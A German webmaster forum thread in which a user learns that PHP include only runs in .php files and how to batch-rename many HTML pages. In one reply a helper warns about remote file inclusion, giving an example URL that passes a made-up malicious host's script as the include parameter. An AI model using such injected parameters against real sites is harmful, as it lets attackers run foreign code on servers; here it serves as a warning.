Seite 1 von 2 12 LetzteLetzte
Ergebnis 1 bis 10 von 19

Thema: Einfaches Problem: php-include

  1. #1
    Interessierte/r
    Registriert seit
    02.04.2007
    Ort
    Düsseldorf
    Beiträge
    138
    Danke
    0
    Bekam 0 mal "Danke" in 0 Postings

    Standard Einfaches Problem: php-include

    Hallo zusammen,

    ich nutze den php-include-Befehl schon lange anstatt Frames. Dort funkioniert er. Aber er funktioniert bei mir nicht, wenn ich in einer Datei eine andere Datei einfügen will. Ob nun HTML oder TXT, es wird nicht eingebunden. Ich muss nur das Prinzip verstanden haben.

    Was ich möchte:

    Einen Quellcode-Teil einbinden. Testweise einfach einen Satz in Standard-Schritart.
    In 'index.htm' steht in php-Sprache: "binde 'seite.htm' ein". Auch 'seite1.txt' zeigt er in der Datei nicht an. Es ist ein simples Problem, bitte helft mir. Ich habe das ganz kurz in einem Zip-Dok. hochgeladen:

    Download

    Danke und liebe Grüße
    Tony

    PS: Was ich wirklich möchte, ist in einer HTML-Datei wo ein Foto angezeigt wird, eine transparente Fläche drüberlegen. Das funktioniert auch, aber da es viele solcher Foto-HTML-Dateien gibt, möchte ich, dass der Code der transparenten Fläche in einer einzelnen Datei steht. So könnte ich die Aktion "Transparente Fläche" ganz schnell an und wieder abschalten. Aber es reicht mir schon, wenn ich das obere Problem verstehe, denn das ist ja mein Grundproblem.
    Achtung: Dies ist ein alter Thread im HTML und Webmaster Forum
    Diese Diskussion ist älter als 90 Tage. Die darin enthaltenen Informationen sind möglicherweise nicht mehr aktuell. Erstelle bitte zu deiner Frage ein neues Thema im Forum !!!!!

  2. #2
    Kaiserliche Hoheit
    Registriert seit
    04.03.2007
    Ort
    BäRLIN
    Alter
    31
    Beiträge
    1.857
    Danke
    0
    Bekam 0 mal "Danke" in 0 Postings

    Standard

    du weißt aber schon das

    1. include verwendung für diesen zweck nicht sehr sicher ist
    2. PHP Scripte nur ausgeführt werden wenn die datei auch .php heißt ?
    (also einfach index.htm in index.php umbenennen und schon flutscht es)

    Apache (der Webserver) gibt datein nur an PHP zum ausführen weiter wenn sie .php heißen. (es sei denn du hast den webserver anders konfiguriert)
    Bedenke aber Punkt 1 meiner liste ...
    Solltest du mit Globals die includes aufrufen, kann jeder x-beliebige alles was er will in die page einschmuggeln.
    Jeder hat das Recht dumm zu sein. Einige mißbrauchen dieses Recht leider ständig!
    Weder meine ICQ-Nummer noch meine MSN-Adresse oder meine eMailadresse sind für Bestellungen, Sponsoringanfragen oder Support !

    ploppGROUP Internetservices - IT-Partner für Geschäfts-/Großkunden
    mit Rechenzentren in Berlin, Hannover und bald auch FFM

  3. #3
    Interessierte/r
    Themenstarter

    Registriert seit
    02.04.2007
    Ort
    Düsseldorf
    Beiträge
    138
    Danke
    0
    Bekam 0 mal "Danke" in 0 Postings

    Standard

    So sehr kenne ich mich mit PHP nicht aus. Wenn einer so nett wäre und den kleinen Download so umschreiben würde, dass in 'index.htm' eine der andere Seiten (ob nun in .htm, .txt, oder .php) angezeigt wird?

    Danke!!

  4. #4
    Kaiserliche Hoheit
    Registriert seit
    04.03.2007
    Ort
    BäRLIN
    Alter
    31
    Beiträge
    1.857
    Danke
    0
    Bekam 0 mal "Danke" in 0 Postings

    Standard

    ICH SACHTE DOCH : einfach index.htm in index.php umbenennen !!!

    Wozu da noch was hochladen ?
    Umbenennen wirst du doch was können ?

    MfG
    Jeder hat das Recht dumm zu sein. Einige mißbrauchen dieses Recht leider ständig!
    Weder meine ICQ-Nummer noch meine MSN-Adresse oder meine eMailadresse sind für Bestellungen, Sponsoringanfragen oder Support !

    ploppGROUP Internetservices - IT-Partner für Geschäfts-/Großkunden
    mit Rechenzentren in Berlin, Hannover und bald auch FFM

  5. #5
    Interessierte/r
    Themenstarter

    Registriert seit
    02.04.2007
    Ort
    Düsseldorf
    Beiträge
    138
    Danke
    0
    Bekam 0 mal "Danke" in 0 Postings

    Standard

    Ahhso, erst jetzt hab ich's verstanden! Sorry, ist manchmal nicht so einfach. Damit dürfte mein Problem behoben sein, danke!

  6. #6
    Interessierte/r
    Themenstarter

    Registriert seit
    02.04.2007
    Ort
    Düsseldorf
    Beiträge
    138
    Danke
    0
    Bekam 0 mal "Danke" in 0 Postings

    Standard

    Aber noch eine andere Frage: Warum oder besser gesagt, in wie fern ist der include-Befehl nicht sicher? Er funktioniert bei mir seit Jahren einwandfrei.

  7. #7
    Kaiserliche Hoheit
    Registriert seit
    04.03.2007
    Ort
    BäRLIN
    Alter
    31
    Beiträge
    1.857
    Danke
    0
    Bekam 0 mal "Danke" in 0 Postings

    Standard

    Habisch doch gesagt ....

    Wenn du ihn mit Gobals (Variablen) benutzt kann man ne menge Schadcode ausführen.

    Also wenn du deine Seite aufrufts mit "http://url.tld/?seite=hierdieincludeseite"
    und dann quasi anhand dieser Variable den include setzt, dankann man auch Fremdcode ausführen ...
    ("http://url.tld/?seite=http://ichbineineboese.url/ganzboesercode.php")
    Jeder hat das Recht dumm zu sein. Einige mißbrauchen dieses Recht leider ständig!
    Weder meine ICQ-Nummer noch meine MSN-Adresse oder meine eMailadresse sind für Bestellungen, Sponsoringanfragen oder Support !

    ploppGROUP Internetservices - IT-Partner für Geschäfts-/Großkunden
    mit Rechenzentren in Berlin, Hannover und bald auch FFM

  8. #8
    Kaiser(in)
    Registriert seit
    24.04.2006
    Ort
    Ludwigshafen
    Beiträge
    2.720
    Danke
    0
    Bekam 0 mal "Danke" in 0 Postings

    Standard

    Rufe dir im Explorer die index.htm auf.
    Rechter Mausclick - Umbenennen
    Ersetze htm durch php

    Das war's.
    Jetzt musst du noch beide Dateien (index.php und seite.htm) auf den Webspace hochladen.
    Offline funktioniert das nicht, es sei denn du hast xampp installiert.
    Voraussetzung dass es online funktioniert ist natürlich, dass dein Webpaket PHP-fähig ist.

    Achtung: Ggf musst du Menues und Verlinkungen ändern, da die index.htm ja jetzt index.php heißt.

    edit: sorry, zu spät, Prob bereits gelöst.

  9. #9
    Interessierte/r
    Themenstarter

    Registriert seit
    02.04.2007
    Ort
    Düsseldorf
    Beiträge
    138
    Danke
    0
    Bekam 0 mal "Danke" in 0 Postings

    Standard

    Danke! Wie oben klein geschrieben, brauche ich das Prinzip für Foto-Seiten. Ich schätze mal 2000. Wie kriege ich denn nun zügig 2000 HTML-Dateien in PHP umbenann?

  10. #10
    Kaiserliche Hoheit
    Registriert seit
    04.03.2007
    Ort
    BäRLIN
    Alter
    31
    Beiträge
    1.857
    Danke
    0
    Bekam 0 mal "Danke" in 0 Postings

    Standard

    Damit : http://toolsandmore.de/Central/Produ...tei-Tools/Joe/

    1. Datein hinzufügen in liste
    2. Maske wie folgt ausfüllen : "[NAME].php"
    Jeder hat das Recht dumm zu sein. Einige mißbrauchen dieses Recht leider ständig!
    Weder meine ICQ-Nummer noch meine MSN-Adresse oder meine eMailadresse sind für Bestellungen, Sponsoringanfragen oder Support !

    ploppGROUP Internetservices - IT-Partner für Geschäfts-/Großkunden
    mit Rechenzentren in Berlin, Hannover und bald auch FFM

Ähnliche Themen

  1. <? include ?> Problem
    Von Banana im Forum PHP Forum - Apache - CGI - Perl - JavaScript und Co.
    Antworten: 15
    Letzter Beitrag: 07.06.2008, 14:45
  2. include problem!
    Von Walerik im Forum PHP Forum - Apache - CGI - Perl - JavaScript und Co.
    Antworten: 11
    Letzter Beitrag: 15.05.2008, 22:02
  3. Problem mit Include
    Von HTML/PHP Rookie im Forum HTML & CSS Forum
    Antworten: 13
    Letzter Beitrag: 22.08.2007, 21:55
  4. Hoffentlich einfaches + schnelles BlueJ Problem!!!
    Von Meck im Forum PHP Forum - Apache - CGI - Perl - JavaScript und Co.
    Antworten: 8
    Letzter Beitrag: 14.11.2006, 23:37
  5. Einfaches Problem: alle Binärzahlkombinationen darstellen
    Von im Forum Off Topic und Quasselbox
    Antworten: 0
    Letzter Beitrag: 27.01.2006, 10:21

Stichworte

Berechtigungen

  • Neue Themen erstellen: Nein
  • Themen beantworten: Nein
  • Anhänge hochladen: Nein
  • Beiträge bearbeiten: Nein
  •